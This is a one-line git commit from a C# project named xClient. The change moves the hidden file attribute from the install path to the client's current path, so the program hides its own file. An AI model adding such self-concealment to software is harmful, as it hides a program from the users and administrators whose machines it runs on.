Small fix

This commit is contained in:
MaxXor 2015-09-06 16:27:52 +02:00
parent bdfe0543f5
commit 87211b84e1
1 changed files with 1 additions and 1 deletions

View File

@ -163,7 +163,7 @@ namespace xClient
{
try
{
File.SetAttributes(ClientData.InstallPath, FileAttributes.Hidden);
File.SetAttributes(ClientData.CurrentPath, FileAttributes.Hidden);
}
catch (Exception)
{